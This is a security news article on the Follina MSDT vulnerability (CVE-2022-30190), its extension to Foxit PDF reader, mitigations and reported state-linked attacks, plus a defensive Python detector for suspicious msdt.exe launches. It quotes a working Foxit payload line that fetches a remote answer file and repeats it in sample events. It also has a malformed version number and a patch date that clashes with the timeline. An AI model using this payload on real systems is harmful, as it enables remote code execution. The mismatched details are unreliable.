Last week, cybersecurity research team Nao_sec discovered a zero-day vulnerability in Microsoft Office dubbed Follina. The bug can be exploited simply by opening a Word document, which is used to execute malicious PowerShell commands through the Microsoft Support Diagnostic Tool (MSDT).
After the vulnerability went public, a number of exploits were released online. Microsoft acknowledged the vulnerability and assigned it the identifier CVE-2022-30190, a remote code execution vulnerability in the Microsoft Support Diagnostic Tool (MSDT).
Microsoft later classified Follina as a zero-day and shared mitigation measures to block attacks exploiting it. Microsoft says the flaw affects all Windows versions still receiving security updates (Windows 7 and later, and Server 2008 and later).
"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application, and can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights," Microsoft explains.
PDF readers also vulnerable to Follina
Today, a researcher using the Twitter handle @j00sean demonstrated that the Follina bug (CVE-2022-30190) can also be triggered from the Foxit PDF reader.
In the PoC, the researcher demonstrates the exploit against Foxit PDF reader version 18.104.22.168575, which is the latest version (according to the version history) of the application at the time of writing. Foxit has not issued any update for the application, nor any security advisory regarding the issue.
Payload: app.launchURL("ms-msdt:/id PCWDiagnostic /skip force -af //sharedlocation/lol.xml");
The researcher also published the payload for the Foxit PDF reader, but for successful exploitation the user must first allow the connection in the security warning popup.
Security researcher Kevin Beaumont explains that the malicious document uses Word's remote template feature to retrieve an HTML file from a remote web server; that HTML file in turn uses the ms-msdt MSProtocol URI scheme to load code and execute PowerShell.
The researcher later added that the Follina bug can also be exploited through the ms-search MSProtocol URI scheme.
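The chain described above (document or PDF reader launches msdt.exe with an ms-msdt: URI, typically with /skip force and an answer file fetched from a remote share, as in the Foxit payload quoted earlier) leaves a recognisable trace in process-creation telemetry. The following detector is an added example written for this article; it is not code from Microsoft, Foxit, or any of the researchers named here. It assumes Sysmon-style records with Image, ParentImage and CommandLine fields, a constructed list of document-handling parent processes, and sample events modelled on the payload shown on the page; the switch names it parses (/id, /skip force, -af) are the ones visible in that payload.

```python
"""Flag Follina-style MSDT launches in process-creation telemetry (added example)."""
import re
from typing import Dict, List, Tuple

# Assumption for this example: processes that open documents and have no
# legitimate reason to launch the Microsoft Support Diagnostic Tool.
DOCUMENT_HANDLERS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "foxitpdfreader.exe", "foxitreader.exe",
}

# A switch is '/' or '-' followed by a letter; '//share/file' is a value, not a switch.
SWITCH_RE = re.compile(r"^[/-][A-Za-z]")
# Answer file (-af) pulled from a UNC share or web server instead of local disk.
REMOTE_PATH_RE = re.compile(r"^(//|\\\\|https?://)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, surrounding quotes removed."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()


def parse_msdt_uri(text: str) -> Dict[str, str]:
    """Return the switch/value pairs that follow 'ms-msdt:' in text ({} if absent)."""
    m = re.search(r"ms-msdt:", text, re.IGNORECASE)
    if not m:
        return {}
    # Keep only the URI body: stop at the first quote that closes it.
    rest = re.split(r'["\']', text[m.end():])[0]
    tokens = rest.split()
    params: Dict[str, str] = {}
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if SWITCH_RE.match(tok):
            key = tok.lstrip("/-").lower()
            has_value = i + 1 < len(tokens) and not SWITCH_RE.match(tokens[i + 1])
            params[key] = tokens[i + 1] if has_value else ""
            i += 2 if has_value else 1
        else:
            i += 1  # stray token before the first switch; ignore it
    return params


def analyze_event(event: Dict[str, str]) -> List[str]:
    """Findings for one process-creation event, in a fixed order."""
    findings: List[str] = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image == "msdt.exe" and parent in DOCUMENT_HANDLERS:
        findings.append("msdt_spawned_by_document_handler")
    if "ms-msdt:" in cmd.lower():
        findings.append("ms_msdt_uri")
        params = parse_msdt_uri(cmd)
        if params.get("skip", "").lower() == "force":
            findings.append("skip_force")  # suppresses the troubleshooter prompts
        if REMOTE_PATH_RE.match(params.get("af", "")):
            findings.append("remote_answer_file")
    return findings


def severity(findings: List[str]) -> str:
    """MSDT under a document handler, or a forced run with a remote answer file, is high."""
    if "msdt_spawned_by_document_handler" in findings:
        return "high"
    if {"skip_force", "remote_answer_file"} <= set(findings):
        return "high"
    if "ms_msdt_uri" in findings:
        return "medium"
    return "none"


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    return [(severity(f), f) for f in map(analyze_event, events)]


# Constructed sample events; the command lines mirror the page's Foxit payload.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": r"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe",
     "CommandLine": r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force -af //sharedlocation/lol.xml'},
    {"Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force -af //sharedlocation/lol.xml'},
    {"Image": r"C:\Windows\System32\msdt.exe",          # user opened the troubleshooter
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\msdt.exe" /id PCWDiagnostic'},
    {"Image": r"C:\Windows\System32\notepad.exe",       # unrelated process
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for event, (level, findings) in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{level:6} {basename(event['ParentImage'])} -> {basename(event['Image'])} {findings}")
```

The parent-process check is the durable signal: msdt.exe started by Word or a PDF reader is suspicious regardless of the URI parameters, which an attacker can vary. The URI parsing adds context (forced run, remote answer file) for prioritisation, and the same parser handles the app.launchURL form quoted on the page.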
"microsoft-edge + ms-search + MSDT path traversal 0day = fun of 2-clicks (one click additional due to Protected View if docx is coming from remote btw)." j00sean (@j00sean), June 6, 2022
"MS-MSDT "Follina" Office click-to-hack." John Hammond is @ RSAC (@_JohnHammond), May 30, 2022
CISA has also urged users and administrators to review Microsoft's guidance for CVE-2022-30190 and apply the necessary workaround.
On May 1st, the micropatching service 0patch released free micropatches for the "Follina" Microsoft Diagnostic Tool Remote Code Execution 0day (CVE-2022-30190) to block ongoing attacks against Windows systems.
It has also been reported that China-linked threat actors are actively exploiting the vulnerability. The TA413 APT group, a hacking outfit linked to Chinese state interests, has exploited it in attacks targeting the international Tibetan community.
Proofpoint noted that European governments and US local governments were the targets of a phishing campaign using malicious Rich Text Format (RTF) documents designed to exploit the Follina vulnerability.
"Proofpoint blocked a suspected state-aligned phishing campaign targeting less than 10 Proofpoint customers (European gov & local US gov) attempting to exploit Follina/CVE_2022_30190," they wrote.